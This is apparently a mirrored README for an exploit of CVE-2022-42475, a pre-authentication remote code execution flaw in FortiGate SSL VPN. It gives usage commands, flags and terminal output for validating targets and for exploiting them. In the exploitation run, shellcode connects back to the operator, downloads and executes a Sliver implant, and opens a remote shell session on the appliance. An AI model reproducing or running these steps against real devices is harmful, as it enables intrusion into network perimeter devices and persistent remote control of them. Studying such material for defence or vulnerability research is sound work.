Share
## https://sploitus.com/exploit?id=48414925-3DD2-506A-921C-DECB9FEB0EA0
# CVE-2022-42475

## Background
This is the exploit for the blog post here: https://bishopfox.com/blog/exploit-cve-2022-42475

## Redacted Version
This version of the exploit will not work without you, the hacker, supplying the necessary memory addresses for ROP gadgets, etc. The work to determine these data is confidential and proprietary to Bishop Fox and I will not (cannot) publish it alongside this exploit. I trust you understand!

## Modes of operation
* Validate only, no exploit. Determines if vulnerable. No payload, no shellcode.
* __Exploit, but verify only__. Run benign connect-back "ping" shellcode to verify the target is exploitable.
* __Exploit with connect-back binary stager__. The shellcode connects back to the exploit, downloads an encrypted operator-supplied binary file (typically [https://gitub.com/BishopFox/Sliver](Sliver)), decrypts the binary, then calls `execve(binary_file)`.

**Note**: At present the "validate only" mode works across all known versions of FortiOS. However, exploits work _only_ against FortiOS 6.0.4 on 100D hardware. I no longer work at BF and therefore cannot publish the expanded exploit that supports something like 18k targets.

## Requirements
* PyCrypto
* pycryptodome

```
pip3 install PyCrypto
pip3 install pycryptodome
```

## Validate only
This will not make any attempt to exploit the bug, but instead triggers it as a crash (the remote SSL VPN daemon restarts automatically and immediately). The crash is detected heuristically and reported to the operator.

Run it using the `-v` validate flag:

```
$ ./x.py -t 192.168.0.10 -p 8443 -v

    --[ CVE-2022-42475: FortiGate Remote Pre-auth RCE ]--
    --[ Bishop Fox Cosmos Team X                      ]--

[+] Running in validate-only mode. No RCE.
[>] Testing to see if target is vulnerable (may take 10 seconds)
[+] Target '192.168.0.10:8443' appears to be VULNERABLE
```

## Exploit, but validate (feature only available for FortiOS 6.0.4 on 100D appliances at present)
This will trigger the bug, deploy a ROP chain, and jump to shellcode. The shellcode is benign and works as follows:

* Exploit connects to target and triggers the vuln to execute shellcode
* Shellcode connects back to operator's IP:port
* Shellcode sends a single "hello" byte to the exploit: `0xbf`
* Exploit delivers a small encrypted test payload to the shellcode (AES key is random each run)
* Shellcode decrypts the payload and saves it to `/tmp/x` on the FortiGate appliance
* Shellcode sends another single `0xbf` byte to the exploit if payload decryption was successful
* Exploit reads the byte and confirms code execution.

Flags:
```
-t           target host/IP
-p           target port
-e           exploit mode
-c           connect-back only mode
-H and -P    operator's IP:port  (required)
-s           software version of FortiOS (required)
-m           hardware model running FortiOS
-d           turn on debugging
```

An example where we select both software version `6.0.4` and the appliance model `100D`:
```
┌──(kali㉿kali)-[/mnt/hgfs/fortios/CVE-2022-42475]
└─$ sudo ./x.py -t 192.168.0.10 -p 8443 -e -c -H 192.168.0.99 -P 443 -s 6.0.4 -m 100D                   130 ⨯

    --[ CVE-2022-42475: FortiGate Remote Pre-auth RCE ]--
    --[ Bishop Fox Cosmos Team X                      ]--

[+] Generating random 128-bit AES key to encrypt payload
[+] Encrypting payload...
[+] Using cached shellcode. Edit ./x.py (look for 'shellcode.s') to force refresh.
[+] Configured for connect-back to 192.168.0.99:443
[+] Starting encrypted payload listener...
[+] Preparing for exploit...
[+] Sending request!
[+] Importing gadgets from 'exploit_data.json'
[ mtls -l 8888

[*] Starting mTLS listener ...

[*] Successfully started job #1
```

Exploit:
```
$ ./x.py -t 192.168.0.10 -p 8443 -e -f implant5 -H 192.168.0.99 -P 443 -s 6.0.4 -m 100D

    --[ CVE-2022-42475: FortiGate Remote Pre-auth RCE ]--
    --[ Bishop Fox Cosmos Team X                      ]--

[+] Exploit will attempt to execve("implant5") on the target
...
[ use d8d5344b-c666-4c60-9e33-5ce50eb82cad

[*] Active session implant5 (d8d5344b-c666-4c60-9e33-5ce50eb82cad)

[server] sliver (implant5) > whoami

Logon ID: 

[server] sliver (implant5) > ls

/ (19 items, 10.0 KiB)
======================
-rw-r--r--   .ash_history        590 B  Tue Jan 31 11:31:57 +0000 2023
drwxr-xr-x   bin                   Tue Jan 31 11:04:35 +0000 2023
drwxr-xr-x   data                  Tue Jan 31 05:24:10 +0000 2023
drwxr-xr-x   data2                 Tue Jan 31 11:40:01 +0000 2023
drwxr-xr-x   dev                   Tue Jan 31 05:26:16 +0000 2023
Lrwxrwxrwx   etc -> data/etc     8 B    Mon Jan 07 18:03:23 +0000 2019
Lrwxrwxrwx   fortidev -> /       1 B    Mon Jan 07 18:03:23 +0000 2019
Lrwxrwxrwx   init -> /sbin/init  10 B   Mon Jan 07 18:03:23 +0000 2019
drwxr-xr-x   lib                   Mon Jan 07 18:03:30 +0000 2019
Lrwxrwxrwx   lib64 -> lib        3 B    Mon Jan 07 18:03:23 +0000 2019
drwxr-xr-x   migadmin              Tue Jan 31 05:23:26 +0000 2023
dr-xr-xr-x   proc                  Tue Jan 31 05:23:13 +0000 2023
drwx------   root                  Mon Jan 07 17:17:34 +0000 2019
drwxr-xr-x   sbin                  Tue Jan 31 05:23:27 +0000 2023
drwxr-xr-x   security-rating       Mon Jan 07 18:01:04 +0000 2019
drwxr-xr-x   sys                   Tue Jan 31 05:23:27 +0000 2023
dtrwxrwxrwx  tmp                   Tue Jan 31 11:40:01 +0000 2023
drwxr-xr-x   usr                   Tue Jan 31 05:23:27 +0000 2023
drwxr-xr-x   var                   Tue Jan 31 05:24:07 +0000 2023
```

Note that Sliver returns `` because FortiOS is kinda mostly sorta Linux, and doesn't always work the way that you'd expect. This is an issue with FortiOS, not Sliver.

## More versions coming soon
I no longer work at Bishop Fox so you'll need to follow the BF github for updates on this.